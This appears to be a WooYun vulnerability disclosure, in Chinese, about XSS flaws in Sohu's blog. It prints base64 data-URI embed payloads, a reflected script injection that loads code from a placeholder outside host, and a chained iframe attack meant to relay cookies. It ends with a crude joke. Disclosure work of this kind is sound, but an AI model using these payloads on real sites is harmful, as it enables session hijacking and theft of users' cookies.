WooYun.org

0x01：
BLOG处：blog.sohu.com 登录并发表博文，
在乌云看到，HTML5标签成功执行

<embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgiS0NGIik8L3NjcmlwdD4=">

地址：http://15270227547.blog.sohu.com/304058734.html
但大哥告诉我此处不能跨域传输cookie。于是暂放一边
0x02：
大哥发话了，不能直接cookie, 但可以中转嘛。
于是：
先来一个iframe框架连接试试。
<iframe src=http://www.baidu.com width=800 height=800></iframe>

<embed src="data:text/html;base64,PGlmcmFtZSBzcmM9aHR0cDovL3d3dy5iYWlkdS5jb20gd2lkdGg9ODAwIGhlaWdodD04MDA+PC9pZnJhbWU+">

地址:http://15270227547.blog.sohu.com/304072155.html
0x03：
大哥说找到了新的xss处，而且搜狐又是酷炫狂拽叼的毫无过滤。
http://act.blog.sohu.com/plus/impeach.jsp?rp=aaa

于是闭合好后构造语句就好
http://act.blog.sohu.com/plus/impeach.jsp?rp="><script src=http://xxxxxx></script><"

0x04：
大哥说万事俱备了，于是回到BLOG日志处，构造语句。
<iframe src='http://act.blog.sohu.com/plus/impeach.jsp?rp="><script src=http://xxxxxx></script>'></iframe>

<embed src="data:text/html;base64,语句……">

于是如下：
http://15270227547.blog.sohu.com/304072236.html

0x05：
另外还有一处DOM。(?act=)
点开搜狐客服博客，随手打开博文一篇博文
admin.blog.sohu.com/282539048.html

admin.blog.sohu.com/282539048.html?act=aaaa

这里的利用比较麻烦。
但说不定有大牛能组合出一个完整利用的poc...

Final：
其实利用的话会很鸡肋，但得看你怎么运用姿势去放大，去绕过浏览器限制等等
搜狐的XSS的确多，这里只需要姿势协调的去配合利用，其实感觉是搜狐的修复机制问题。比如最后的DOM。。

夜深了，我的针管早已饥渴难耐了，给女朋友打气去了，就不找姿势了。